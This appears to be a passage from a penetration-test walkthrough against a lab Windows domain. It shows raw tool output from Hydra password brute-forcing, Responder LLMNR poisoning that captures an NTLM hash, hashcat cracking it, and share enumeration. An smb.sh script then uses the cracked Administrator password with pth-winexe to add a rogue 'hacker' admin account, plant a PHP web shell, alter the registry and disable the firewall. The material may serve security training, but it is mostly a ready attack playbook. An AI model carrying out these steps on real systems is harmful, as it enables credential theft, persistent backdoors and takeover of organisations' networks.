[445][smb] host: 192.168.1.138   login: Administrator   password: Password123$
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-02-01 07:07:54
 + -- --=[Port 389 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:54
[ERROR] you may only use one of -l, -L or -m

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:54
[ERROR] you may only use one of -l, -L or -m

 + -- --=[Port 443 closed... skipping.
 + -- --=[Port 445 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:54
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.138   login: Administrator   password: Password123$
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-02-01 07:07:54
 + -- --=[Port 512 closed... skipping.
 + -- --=[Port 513 closed... skipping.
 + -- --=[Port 514 closed... skipping.
 + -- --=[Port 993 closed... skipping.
 + -- --=[Port 1433 closed... skipping.
 + -- --=[Port 1521 closed... skipping.
 + -- --=[Port 3306 closed... skipping.
 + -- --=[Port 3389 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:54
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] max 30 tasks per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~0 tries per task
[DATA] attacking service rdp on port 3389
[STATUS] 304.00 tries/min, 304 tries in 00:01h, 18446744073709551488 todo in 5124095576030430:60h, 30 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
 + -- --=[Port 5432 closed... skipping.
 + -- --=[Port 5900 closed... skipping.
 + -- --=[Port 5901 closed... skipping.
 + -- --=[Port 8000 closed... skipping.
 + -- --=[Port 8080 closed... skipping.
 + -- --=[Port 8100 closed... skipping.
 + -- --=[Port 6667 closed... skipping.

################################### Done! ###########################################

MAN IN THE MIDDLE (MITM)

NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C

[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: ALL
Challenge set: 1122334455667788
WPAD Proxy Server: False
WPAD script loaded:  function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: False
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFF

NBT-NS Answer sent to: 192.168.1.146. The requested name was : TEST-3F6416AC49
NBT-NS Answer sent to: 192.168.1.138. The requested name was : TEST-3F6416AC49
LLMNR poisoned answer sent to this IP: 192.168.1.138. The requested name was : TEST-3F6416AC49.
NBT-NS Answer sent to: 192.168.1.138. The requested name was : BUENOSAIRES
LLMNR poisoned answer sent to this IP: 192.168.1.138. The requested name was : BUENOSAIRES.
NBT-NS Answer sent to: 192.168.1.129. The requested name was : XEROSECURITY
+]SMB-NTLMv1 hash captured from :  192.168.1.129
[+]SMB complete hash is : Administrator::XEROSECURITY:2E648C1D752DE4B100000000000000000000000000000000:D08EBBB84EF4F24EAACF2F5A077FD2C91E22C1A3722C4EB9:1122334455667788

PASSWORD CRACKING

Initializing hashcat v2.00 with 8 threads and 32mb segment-size...

Added hashes from file /tmp/hashes: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

[s]tatus [p]ause [r]esume [b]ypass [q]uit => 

Input.Mode: Dict (/pentest/lists/passwords/hashkiller.com.dic)
Index.....: 2/8 (segment), 3313392 (words), 33550341 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 65.29M plains, 65.29M words
Progress..: 3313392/3313392 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--

ADMINISTRATOR::XEROSECURITY:2e648c1d752de4b100000000000000000000000000000000:d08ebbb84ef4f24eaacf2f5a077fd2c91e22c1a3722c4eb9:1122334455667788:Password123$
                                             
All hashes have been recovered

Started: Sun Jan 31 15:09:14 2016
Stopped: Sun Jan 31 15:09:16 2016
[email protected]:~#

ENUMERATING SMB SHARES

  • [email protected]:/pentest/windows/CredCrack# ./credcrack.py -d XEROSECURITY -u Administrator -f /pentest/loot/win-targets.txt -l 192.168.1.113 -es
Password: 

 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Validating 192.168.1.129
[*] Validating 192.168.1.138

 -----------------------------------------------------------------
 192.168.1.129 - Windows 5.1 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.129\C 
 OPEN      \\192.168.1.129\Downloads 
 OPEN      \\192.168.1.129\ADMIN$ 
 OPEN      \\192.168.1.129\C$ 

 -----------------------------------------------------------------
 192.168.1.138 - Windows Server 2012 R2 Datacenter 9600 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.138\ADMIN$ 
 CLOSED    \\192.168.1.138\C 
 OPEN      \\192.168.1.138\C$ 
 OPEN      \\192.168.1.138\Desktop 
 OPEN      \\192.168.1.138\NETLOGON 
 OPEN      \\192.168.1.138\SYSVOL 

[*] Done! Completed in 0.2s

COMMAND EXECUTION

smb.sh

#!/bin/bash
TARGET=$1
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "systeminfo"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "whoami /all"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "ipconfig /all"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "netstat -ano"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "net accounts"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "net localgroup administrators"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "net share"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "net view"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "powershell.exe -command Get-Hotfix"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "net user hacker Password123$ /add"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "net localgroup Administrators /add hacker"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "net group 'Domain Admins' /domain"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "echo ^< ?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\backdoor.php"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fAllowToGetHelp /t REG_DWORD /d 1 /f"
pth-winexe -U XEROSECURITY/Administrator%Password123$ --system //$TARGET "netsh firewall set opmode disable"
  • [email protected]:/pentest/windows# for a in `cat /pentest/loot/win-targets.txt`; do bash smb.sh $a; done;
E_md4hash wrapper called.

Host Name:                 TEST-3F6416AC49
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 2 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Test User
Registered Organization:   
Product ID:                76487-640-2577743-23951
Original Install Date:     11/2/2015, 10:44:53 AM
System Up Time:            1 Days, 16 Hours, 44 Minutes, 36 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              4 Processor(s) Installed.
                           [01]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~3184 Mhz
                           [02]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~3184 Mhz
                           [03]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~3184 Mhz
                           [04]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~3184 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-05:00) Eastern Time (US & Canada)
Total Physical Memory:     511 MB
Available Physical Memory: 324 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    xerosecurity.com
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.1.1
                                 IP address(es)
                                 [01]: 192.168.1.129
E_md4hash wrapper called.
Error: error Creating process(whoami /all) 2
E_md4hash wrapper called.

Windows IP Configuration

        Host Name . . . . . . . . . . . . : test-3f6416ac49
        Primary Dns Suffix  . . . . . . . : xerosecurity.com
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
        DNS Suffix Search List. . . . . . : xerosecurity.com

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : 
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-0C-29-FB-8C-7C
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
        IP Address. . . . . . . . . . . . : 192.168.1.129
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
        DHCP Server . . . . . . . . . . . : 192.168.1.1
        DNS Servers . . . . . . . . . . . : 206.248.154.22
                                            206.248.154.170
                                            192.168.1.1
        Lease Obtained. . . . . . . . . . : Monday, February 01, 2016 2:36:34 AM
        Lease Expires . . . . . . . . . . : Tuesday, February 02, 2016 2:36:34 AM
E_md4hash wrapper called.

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       976
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:2869           0.0.0.0:0              LISTENING       1268
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       912
  TCP    127.0.0.1:1039         0.0.0.0:0              LISTENING       212
  TCP    192.168.1.129:139      0.0.0.0:0              LISTENING       4
  TCP    192.168.1.129:445      192.168.1.113:41671    ESTABLISHED     4
  TCP    192.168.1.129:445      192.168.1.113:46445    ESTABLISHED     4
  TCP    192.168.1.129:445      192.168.1.113:47203    ESTABLISHED     4
  TCP    192.168.1.129:2990     206.248.168.153:80     CLOSE_WAIT      2592
  TCP    192.168.1.129:2991     206.248.168.153:80     CLOSE_WAIT      2592
  TCP    192.168.1.129:3600     192.168.1.138:139      TIME_WAIT       0
  TCP    192.168.1.129:3601     192.168.1.138:139      TIME_WAIT       0
  TCP    192.168.1.129:3603     192.168.1.138:139      TIME_WAIT       0
  TCP    192.168.1.129:3605     192.168.1.138:135      ESTABLISHED     708
  TCP    192.168.1.129:3606     192.168.1.138:49158    ESTABLISHED     708
  UDP    0.0.0.0:445            *:*                                    4
  UDP    0.0.0.0:500            *:*                                    708
  UDP    0.0.0.0:1027           *:*                                    1196
  UDP    0.0.0.0:1028           *:*                                    1196
  UDP    0.0.0.0:4500           *:*                                    708
  UDP    127.0.0.1:123          *:*                                    1072
  UDP    127.0.0.1:1321         *:*                                    1072
  UDP    127.0.0.1:1900         *:*                                    1268
  UDP    192.168.1.129:123      *:*                                    1072
  UDP    192.168.1.129:137      *:*                                    4
  UDP    192.168.1.129:138      *:*                                    4
  UDP    192.168.1.129:1900     *:*                                    1268
E_md4hash wrapper called.
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.

E_md4hash wrapper called.
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacker
test
test2
XEROSECURITY\Domain Admins
The command completed successfully.

E_md4hash wrapper called.

Share name   Resource                        Remark

-------------------------------------------------------------------------------
ADMIN$       C:\WINDOWS                      Remote Admin                      
C$           C:\                             Default share                     
IPC$                                         Remote IPC                        
C            C:\                             
Downloads    C:\Documents and Settings\test\My Documents\Downloads
                                             
The command completed successfully.

E_md4hash wrapper called.
Error: error Creating process(powershell.exe -command Get-Hotfix) 2
E_md4hash wrapper called.
The account already exists.

More help is available by typing NET HELPMSG 2224.

E_md4hash wrapper called.
System error 1378 has occurred.

The specified account name is already a member of the local group.

E_md4hash wrapper called.
The syntax of this command is:


NET GROUP 
[groupname [/COMMENT:"text"]] [/DOMAIN]
          groupname {/ADD [/COMMENT:"text"] | /DELETE}  [/DOMAIN]
          groupname username [...] {/ADD | /DELETE} [/DOMAIN]

E_md4hash wrapper called.
Error: error Creating process(echo ^ > C:\inetpub\wwwroot\backdoor.php) 2
E_md4hash wrapper called.

Error:  Invalid key name
E_md4hash wrapper called.
Ok.

E_md4hash wrapper called.

Host Name:                 WIN-8MSB2DD52P9
OS Name:                   Microsoft Windows Server 2012 R2 Datacenter
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00253-50000-00000-AA442
Original Install Date:     7/4/2015, 7:01:25 AM
System Boot Time:          1/30/2016, 2:26:03 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 26 Stepping 5 GenuineIntel ~3184 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/20/2014
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     511 MB
Available Physical Memory: 40 MB
Virtual Memory: Max Size:  1,443 MB
Virtual Memory: Available: 597 MB
Virtual Memory: In Use:    846 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    xerosecurity.com
Logon Server:              N/A
Hotfix(s):                 15 Hotfix(s) Installed.
                           [01]: KB2862152
                           [02]: KB2868626
                           [03]: KB2876331
                           [04]: KB2883200
                           [05]: KB2884101
                           [06]: KB2884846
                           [07]: KB2887595
                           [08]: KB2888505
                           [09]: KB2894029
                           [10]: KB2894179
                           [11]: KB2898514
                           [12]: KB2900986
                           [13]: KB2901101
                           [14]: KB2906956
                           [15]: KB2908174
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.1.1
                                 IP address(es)
                                 [01]: 192.168.1.138
                                 [02]: fe80::7494:32dd:efa1:e825
                                 [03]: fd2c:60b4:7f15:0:7494:32dd:efa1:e825
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
E_md4hash wrapper called.

USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner    
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                   


PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeLockMemoryPrivilege           Lock pages in memory                      Enabled 
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTcbPrivilege                  Act as part of the operating system       Enabled 
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Enabled 
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Enabled 
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Enabled 
SeCreatePagefilePrivilege       Create a pagefile                         Enabled 
SeCreatePermanentPrivilege      Create permanent shared objects           Enabled 
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeAuditPrivilege                Generate security audits                  Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Enabled 
SeTimeZonePrivilege             Change the time zone                      Enabled 
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Enabled 


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
E_md4hash wrapper called.

Windows IP Configuration

   Host Name . . . . . . . . . . . . : WIN-8MSB2DD52P9
   Primary Dns Suffix  . . . . . . . : xerosecurity.com
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : xerosecurity.com

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-82-29-F9
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : fd2c:60b4:7f15:0:7494:32dd:efa1:e825(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::7494:32dd:efa1:e825%12(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.1.138(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Saturday, January 30, 2016 2:26:32 PM
   Lease Expires . . . . . . . . . . : Tuesday, February 2, 2016 2:26:32 AM
   Default Gateway . . . . . . . . . : 192.168.1.1
   DHCP Server . . . . . . . . . . . : 192.168.1.1
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-1E-3E-C6-BF-00-0C-29-82-29-F9
   DNS Servers . . . . . . . . . . . : ::1
                                       127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{1D60A0B6-4065-4D98-9C38-7326AA07D13E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
E_md4hash wrapper called.

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:42             0.0.0.0:0              LISTENING       1752
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       536
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       708
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       536
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       536
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       708
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       536
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       536
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       536
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1572
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       1256
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       432
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       824
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       864
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       536
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       536
  TCP    0.0.0.0:49158          0.0.0.0:0              LISTENING       536
  TCP    0.0.0.0:49159          0.0.0.0:0              LISTENING       1220
  TCP    0.0.0.0:49164          0.0.0.0:0              LISTENING       1752
  TCP    0.0.0.0:49165          0.0.0.0:0              LISTENING       1380
  TCP    0.0.0.0:49168          0.0.0.0:0              LISTENING       528
  TCP    0.0.0.0:49170          0.0.0.0:0              LISTENING       1396
  TCP    0.0.0.0:49174          0.0.0.0:0              LISTENING       2400
  TCP    0.0.0.0:49188          0.0.0.0:0              LISTENING       1324
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       1396
  TCP    192.168.1.138:53       0.0.0.0:0              LISTENING       1396
  TCP    192.168.1.138:135      192.168.1.129:3605     ESTABLISHED     708
  TCP    192.168.1.138:139      0.0.0.0:0              LISTENING       4
  TCP    192.168.1.138:445      192.168.1.113:43090    ESTABLISHED     4
  TCP    192.168.1.138:445      192.168.1.113:47294    ESTABLISHED     4
  TCP    192.168.1.138:445      192.168.1.113:47313    ESTABLISHED     4
  TCP    192.168.1.138:49158    192.168.1.129:3606     ESTABLISHED     536
  TCP    192.168.1.138:49158    192.168.1.129:3607     ESTABLISHED     536
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:88                [::]:0                 LISTENING       536
  TCP    [::]:135               [::]:0                 LISTENING       708
  TCP    [::]:389               [::]:0                 LISTENING       536
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:464               [::]:0                 LISTENING       536
  TCP    [::]:593               [::]:0                 LISTENING       708
  TCP    [::]:636               [::]:0                 LISTENING       536
  TCP    [::]:3268              [::]:0                 LISTENING       536
  TCP    [::]:3269              [::]:0                 LISTENING       536
  TCP    [::]:3389              [::]:0                 LISTENING       1572
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:9389              [::]:0                 LISTENING       1256
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       432
  TCP    [::]:49153             [::]:0                 LISTENING       824
  TCP    [::]:49154             [::]:0                 LISTENING       864
  TCP    [::]:49155             [::]:0                 LISTENING       536
  TCP    [::]:49157             [::]:0                 LISTENING       536
  TCP    [::]:49158             [::]:0                 LISTENING       536
  TCP    [::]:49159             [::]:0                 LISTENING       1220
  TCP    [::]:49164             [::]:0                 LISTENING       1752
  TCP    [::]:49165             [::]:0                 LISTENING       1380
  TCP    [::]:49168             [::]:0                 LISTENING       528
  TCP    [::]:49170             [::]:0                 LISTENING       1396
  TCP    [::]:49174             [::]:0                 LISTENING       2400
  TCP    [::]:49188             [::]:0                 LISTENING       1324
  TCP    [::1]:53               [::]:0                 LISTENING       1396
  TCP    [::1]:389              [::1]:49160            ESTABLISHED     536
  TCP    [::1]:389              [::1]:49161            ESTABLISHED     536
  TCP    [::1]:389              [::1]:54815            ESTABLISHED     536
  TCP    [::1]:49160            [::1]:389              ESTABLISHED     1436
  TCP    [::1]:49161            [::1]:389              ESTABLISHED     1436
  TCP    [::1]:54815            [::1]:389              ESTABLISHED     1396
  TCP    [fd2c:60b4:7f15:0:7494:32dd:efa1:e825]:53  [::]:0                 LISTENING       1396
  TCP    [fe80::7494:32dd:efa1:e825%12]:53  [::]:0                 LISTENING       1396
  TCP    [fe80::7494:32dd:efa1:e825%12]:389  [fe80::7494:32dd:efa1:e825%12]:54816  ESTABLISHED     536
  TCP    [fe80::7494:32dd:efa1:e825%12]:389  [fe80::7494:32dd:efa1:e825%12]:54820  ESTABLISHED     536
  TCP    [fe80::7494:32dd:efa1:e825%12]:49155  [fe80::7494:32dd:efa1:e825%12]:49196  ESTABLISHED     536
  TCP    [fe80::7494:32dd:efa1:e825%12]:49155  [fe80::7494:32dd:efa1:e825%12]:49265  ESTABLISHED     536
  TCP    [fe80::7494:32dd:efa1:e825%12]:49196  [fe80::7494:32dd:efa1:e825%12]:49155  ESTABLISHED     1324
  TCP    [fe80::7494:32dd:efa1:e825%12]:49265  [fe80::7494:32dd:efa1:e825%12]:49155  ESTABLISHED     536
  TCP    [fe80::7494:32dd:efa1:e825%12]:54816  [fe80::7494:32dd:efa1:e825%12]:389  ESTABLISHED     1324
  TCP    [fe80::7494:32dd:efa1:e825%12]:54820  [fe80::7494:32dd:efa1:e825%12]:389  ESTABLISHED     1324
  UDP    [fd2c:60b4:7f15:0:7494:32dd:efa1:e825]:53  *:*                                    1396
  UDP    [fd2c:60b4:7f15:0:7494:32dd:efa1:e825]:88  *:*                                    536
  UDP    [fd2c:60b4:7f15:0:7494:32dd:efa1:e825]:464  *:*                                    536
  UDP    [fe80::7494:32dd:efa1:e825%12]:53  *:*                                    1396
  UDP    [fe80::7494:32dd:efa1:e825%12]:88  *:*                                    536
  UDP    [fe80::7494:32dd:efa1:e825%12]:464  *:*                                    536
E_md4hash wrapper called.
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.

E_md4hash wrapper called.
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
hacker
The command completed successfully.

E_md4hash wrapper called.

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share                     
IPC$                                         Remote IPC                        
ADMIN$       C:\Windows                      Remote Admin                      
Desktop      C:\Users\Administrator\Desktop  
NETLOGON     C:\Windows\SYSVOL\sysvol\xerosecurity.com\SCRIPTS
                                             Logon server share                
SYSVOL       C:\Windows\SYSVOL\sysvol        Logon server share                
The command completed successfully.

E_md4hash wrapper called.

Source        Description      HotFixID      InstalledBy          InstalledOn  
------        -----------      --------      -----------          -----------  
WIN-8MSB2D... Security Update  KB2862152     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Security Update  KB2868626     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Security Update  KB2876331     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Update           KB2883200     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Update           KB2884101     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Update           KB2884846     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Update           KB2887595     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Security Update  KB2888505     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Update           KB2894029     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Update           KB2894179     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Update           KB2898514     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Security Update  KB2900986     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Update           KB2901101     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Update           KB2906956     XEROSECURITY\Admi... 11/14/2013...
WIN-8MSB2D... Update           KB2908174     XEROSECURITY\Admi... 11/14/2013...


E_md4hash wrapper called.
The account already exists.

More help is available by typing NET HELPMSG 2224.

E_md4hash wrapper called.
System error 1378 has occurred.

The specified account name is already a member of the group.

E_md4hash wrapper called.
The syntax of this command is:

NET GROUP
